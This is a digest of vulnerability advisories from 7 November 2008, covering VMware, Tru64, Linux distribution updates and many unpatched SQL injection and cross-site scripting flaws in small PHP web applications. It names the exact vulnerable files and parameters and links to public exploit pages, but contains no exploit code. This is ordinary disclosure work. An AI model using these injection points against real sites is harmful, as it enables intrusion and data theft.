VULNERABILITIES \ FIXES - November 7, 2008

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch


OS: VMware ESX Server 2.x
VMware ESX Server 3.x
VMware ESXi 3.x

Description:
Some vulnerabilities have been reported in VMware ESX and ESXi, which can be exploited by malicious, local users to gain escalated privileges.

Solution:
Update to the latest version or apply patches.

Provided and/or discovered by:
The vendor credits:
1) Derek Soeder
2) Michel Toussaint

Original Advisory:
VMSA-2008-0018:
http://lists.vmware.com/pipermail/security-announce/2008/000042.html

Other References:
SA32612:
http://secunia.com/advisories/32612/

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch


OS: HP Tru64 UNIX 5.x

Description:
A vulnerability has been reported in HP Tru64 UNIX, which can be exploited by malicious, local users to gain escalated privileges.

The vulnerability is caused due to an unspecified error within the AdvFS "showfile" command, which can be exploited to gain escalated privileges.

The vulnerability is reported in HP Tru64 UNIX version 5.1B-4 and 5.1B-3.

Solution:
Apply ERP kits.

HP Tru64 UNIX v 5.1B-4:
http://www.itrc.hp.com/service/patch/...hid=T64KIT1001551-V51BB27-ES-20081015

HP Tru64 UNIX v 5.1B-3:
http://www.itrc.hp.com/service/patch/...hid=T64KIT1001540-V51BB26-ES-20080916

Provided and/or discovered by:
The vendor credits Ilja van Sprundel.

Original Advisory:
HPSBTU02383 SSRT080098:
http://itrc.hp.com/service/cki/docDisplay.do?docId=c01599842

Release Date: 2008-11-07

Critical:
Less critical
Impact: Security Bypass

Where: From remote
Solution Status: Vendor Patch


OS: Fedora 8
Fedora 9

Description:
Fedora has issued an update for php-Smarty. This fixes a vulnerability, which can be exploited by malicious people to bypass certain security restrictions.

Solution:
Apply updated packages via the yum utility ("yum update php-Smarty").

Original Advisory:
FEDORA-2008-9401:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00093.html

FEDORA-2008-9420:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00117.html

Other References:
SA32329:
http://secunia.com/advisories/32329/

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch


OS: Fedora 9

Description:
Fedora has issued an update for cman, gfs2-utils, and rgmanager. This fixes some security issues, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

Solution:
Apply updated packages via the yum utility ("yum update cman gfs2-utils rgmanager").

Original Advisory:
FEDORA-2008-9458:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00163.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00164.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00165.html

Other References:
SA32602:
http://secunia.com/advisories/32602/

Release Date: 2008-11-07

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Patch


OS: Fedora 9

Description:
Fedora has issued an update for drupal-cck. This fixes some vulnerabilities, which can be exploited by malicious users to conduct script insertion attacks.

Solution:
Apply updated packages via the yum utility ("yum update drupal-cck").

Original Advisory:
FEDORA-2008-9479:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00178.html

Other References:
SA32572:
http://secunia.com/advisories/32572/

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: DoS

Where: From remote
Solution Status: Vendor Patch


OS: Fedora 8
Fedora 9

Description:
Fedora has issued an update for ipsec-tools. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service).

Solution:
Apply updated packages via the yum utility ("yum update ipsec-tools").

Original Advisory:
FEDORA-2008-9007:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00129.html

FEDORA-2008-9016:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00190.html

Other References:
SA31450:
http://secunia.com/advisories/31450/

SA31478:
http://secunia.com/advisories/31478/

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote
Solution Status: Unpatched


Software: Mole Group Pizza Online Ordering Script

Description:
Cyb3r-1sT has reported a vulnerability in Mole Group Pizza Online Ordering Script, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "manufacturers_id" in index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Filter malicious characters or character sequences using a proxy.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7030

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch


Software: VMware ACE 1.x
VMWare ACE 2.x
VMware Player 1.x
VMWare Player 2.x
VMware Server 1.x
VMware Workstation 5.x
VMware Workstation 6.x

Description:
A vulnerability has been reported in various VMware products, which can be exploited by malicious, local users to gain escalated privileges.

The vulnerability is caused due to an error in the CPU hardware emulation when handling the Trap flag, which can be exploited by a local user on a guest operating system to gain escalated privileges.

Please see vendor's advisory for a list of affected products and versions.

Provided and/or discovered by:
The vendor credits Derek Soeder.

Original Advisory:
VMSA-2008-0018:
http://lists.vmware.com/pipermail/security-announce/2008/000042.html

Release Date: 2008-11-07

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Unpatched


Software: Nagios 3.x

Description:
Andreas Ericsson has discovered a vulnerability in Nagios, which can be exploited by malicious people to conduct cross-site request forgery attacks.

The application allows users to perform certain actions via HTTP requests to "cmd.cgi" without performing any validity checks to verify the request. This can be exploited to execute certain Nagios commands (e.g. to disable notifications) when a logged-in administrator visits a malicious web site.

The vulnerability is confirmed in version 3.0.5. Other versions may also be affected.

Solution:
Do not browse untrusted sites or follow untrusted links while being logged in to the application.

Provided and/or discovered by:
Andreas Ericsson

Original Advisory:
http://www.openwall.com/lists/oss-security/2008/11/06/2

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: DoS
System access

Where: From remote
Solution Status: Vendor Patch


OS: Ubuntu Linux 6.06
Ubuntu Linux 7.10
Ubuntu Linux 8.04

Description:
Ubuntu has issued an update for tk. This fixes a vulnerability, which can be exploited by malicious people to compromise an application using the library.

Solution:
Apply updated packages.

Original Advisory:
USN-664-1:
https://lists.ubuntu.com/archives/ubu...ty-announce/2008-November/000772.html

Other References:
SA28784:
http://secunia.com/advisories/28784/

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: DoS
System access

Where: From remote
Solution Status: Vendor Patch


OS: Ubuntu Linux 6.06
Ubuntu Linux 7.10

Description:
Ubuntu has issued an update for netpbm. This fixes a vulnerability, which can be exploited by malicious people to potentially compromise a vulnerable system.

Solution:
Apply updated packages.

Original Advisory:
USN-665-1:
https://lists.ubuntu.com/archives/ubu...ty-announce/2008-November/000773.html

Other References:
SA20729:
http://secunia.com/advisories/20729/

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch


Software: Cluster Project 2.x

Description:
Some security issues have been reported in Cluster Project, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issues are caused due to unspecified scripts provided by the CMAN, rgmanager, and gfs2 components using temporary files in an insecure manner. This can be exploited to perform unspecified actions with escalated privileges.

The security issues are reported in versions prior to 2.03.09.

Solution:
Update to version 2.03.09.

Provided and/or discovered by:
Reported via Fedora update advisories.

Changelog:
2008-11-07: Updated "Description" section with information about additionally affected components. Added links to the "Original Advisory" section.

Original Advisory:
FEDORA-2008-9458:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00163.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00164.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00165.html

http://secunia.com/advisories/32602/

Release Date: 2008-11-07

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Workaround


Software: TestLink 1.x

Description:
Some vulnerabilities have been reported in TestLink, which can be exploited by malicious users to conduct script insertion attacks.

Input passed via e.g. test project and test plan names is not properly sanitised before being stored. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious data is viewed.

The vulnerabilities are reported in versions prior to 1.8 RC1.

Solution:
Fixed in unstable version 1.8 RC1.

Filter malicious characters and character sequences in a web proxy.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sourceforge.net/project/shownotes.php?release_id=638751

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: DevelopItEasy Events Calendar 1.x



Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy Events Calendar, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in calendar_details.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7013

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: DevelopItEasy News And Article System 1.x



Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy News And Article System, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "aid" parameter in article_details.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.4. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7014

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: DevelopItEasy Membership System 1.x

Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy Membership System, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "email" and "password" parameters in customer_login.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.3. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7015

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: DevelopItEasy Photo Gallery 1.x

Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy Photo Gallery, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "cat_id" parameter in gallery_category.php, to the "photo_id" parameter in gallery_photo.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7016

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: TurnkeyForms Local Classifieds

Description:
TR-ShaRk has reported a vulnerability in TurnkeyForms Local Classifieds, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "r" parameter in listtest.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Note: This can also be exploited to conduct cross-site scripting attacks.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
TR-ShaRk

Original Advisory:
http://milw0rm.com/exploits/7035

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Unpatched


Software: DigitalDJ 0.x

Description:
A security issue has been reported in DigitalDJ, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issue is caused due to the fest.pl script using temporary files in an insecure manner. This can be exploited to e.g. overwrite arbitrary files via symlink attacks.

The security issue is reported in version 0.7.5. Other versions may also be affected.

Solution:
Restrict local access to trusted users only.

Provided and/or discovered by:
Reported by Dmitry E. Oboukhov in a Debian bug report.

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496399

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Unpatched


Software: lmbench 2.x

Description:
Some security issue have been reported in lmbench, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issues are caused due to the "scripts/****" and "scripts/rccs" scripts using temporary files in an insecure manner. This can be exploited to overwrite arbitrary files via symlink attacks.

NOTE: Similar security issues in src/rhttp.c, src/lat_fcntl.c, src/lat_fifo.c, src/lat_proc.c, and src/lmhttp.c have also been reported.

The security issues affect version 2.5. Other versions may also be affected.

Solution:
Restrict local access to trusted users only.

Provided and/or discovered by:
Reported by Dmitry E. Oboukhov and Thijs Kinkhorst in a Debian bug report for development version 3.0-a7.

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496427

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: PHP Classifieds 7.x

Description:
ZoRLu has reported a vulnerability in PHP Classifieds, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "admin_username" parameter in login.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
ZoRLu

Original Advisory:
http://milw0rm.com/exploits/7023

Release Date: 2008-11-07

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Patch


Software: Silva 1.x
Silva 2.x

Description:
Russ McRee has reported a vulnerability in Silva, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input passed via the "fulltext" parameter to the Silva Find component when performing a search is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerability is reported in Silva Find version 1.1.5 and prior included in Silva prior to 2.1.0.2, 2.0.12.2, and 1.6.3.2.

Solution:
Update to version 2.1.0.2, 2.0.12.2, or 1.6.3.2.

Provided and/or discovered by:
Russ McRee, HolisticInfoSec

Original Advisory:
http://holisticinfosec.org/content/view/91/45/

Release Date: 2008-11-07

Critical:
Not critical
Impact: Security Bypass

Where: Local system
Solution Status: Vendor Patch


OS: Sun System Firmware 6.6.x
Sun System Firmware 7.1.x

Description:
A vulnerability has been reported in Sun System Firmware, which can be exploited by malicious, local users to bypass certain security restrictions.

The vulnerability is caused due to an unspecified error in the firmware for certain Sun SPARC systems, which can be exploited by privileged users to access memory in another logical domain.

The vulnerability affects systems using the Sun UltraSPARC T1, UltraSPARC T2, and UltraSPARC T2+ processors.

Solution:
Update to fixed versions.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244826-1

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Vendor Patch


Software: EC-CUBE 1.x
EC-CUBE 2.x

Description:
A vulnerability has been reported in EC-CUBE, which can be exploited by malicious people to conduct SQL injection attacks.

Solution:
The vendor has released updated versions:
http://www.ec-cube.net/download/index.php

Provided and/or discovered by:
Reported via JPCERT/CC.

Original Advisory:
http://jvn.jp/en/jp/JVN19072922/index.html

Release Date: 2008-11-07



Critical:
Moderately critical
Impact: Cross Site Scripting
DoS
System access

Where: From remote
Solution Status: Vendor Patch


OS: openSUSE 10.2
openSUSE 10.3
openSUSE 11.0
SUSE Linux Enterprise Server 10
SUSE Linux Enterprise Server 9



Software: Novell Open Enterprise Server 1.x

Description:
SUSE has issued an update for multiple packages. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting and cross-site request forgery attacks, cause a DoS (Denial of Service), and compromise a vulnerable system.

Solution:
Updated packages are available via YaST Online Update or the SUSE FTP server.

Original Advisory:
SUSE-SR:2008:024:
http://lists.opensuse.org/opensuse-security-announce/2008-11/msg00000.html

Other References:
SA28046:
http://secunia.com/advisories/28046/

SA31384:
http://secunia.com/advisories/31384/

SA32137:
http://secunia.com/advisories/32137/

Release Date: 2008-11-07

Critical:
Less critical
Impact: DoS

Where: From local network
Solution Status: Vendor Patch


OS: IBM Hardware Management Console (HMC)

Description:
A vulnerability has been reported in IBM Hardware Management Console (HMC), which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error within the Resource Monitoring and Control (RMC) daemon and can be exploited to crash the daemon via a specially crafted packet with an invalid client packet length.

Solution:
Update to version 7 Release 3.3.0 SP2 or Release 3.2.0 SP1.
https://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
IBM (MH01133, MH01134):
http://www14.software.ibm.com/webapp/...criptions/pqvcmjd?mode=18&ID=4441
http://www14.software.ibm.com/webapp/...criptions/pqvcmjd?mode=18&ID=4442

http://secunia.com/advisories/32571/

Release Date: 2008-11-07

Critical:
Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Unpatched


Software: Firewall Builder 2.x

Description:
A security issue has been reported in Firewall Builder, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issue is caused due to the src/tools/fwb_install script using temporary files in an insecure manner. This can be exploited to e.g. overwrite arbitrary files via symlink attacks.

The security issue is reported in version 2.1.19. Other versions may also be affected.

Solution:
Restrict local access to trusted users only.

Provided and/or discovered by:
Reported by Dmitry E. Oboukhov in a Debian bug report.

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496406

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Cross Site Scripting
Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: TurnkeyForms Software Directory

Description:
G4N0K has reported some vulnerabilities in TurnkeyForms Software Directory, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

1) Input passed to the "cid" parameter in showcategory.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed to the "msg" parameter in signinform.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session, in the context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
G4N0K

Original Advisory:
http://milw0rm.com/exploits/7027

Release Date: 2008-11-07

Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: TurnkeyForms Business Survey Pro

Description:
G4N0K has reported a vulnerability in TurnkeyForms Business Survey Pro, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in survey_results_text.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
G4N0K

Original Advisory:
http://milw0rm.com/exploits/7029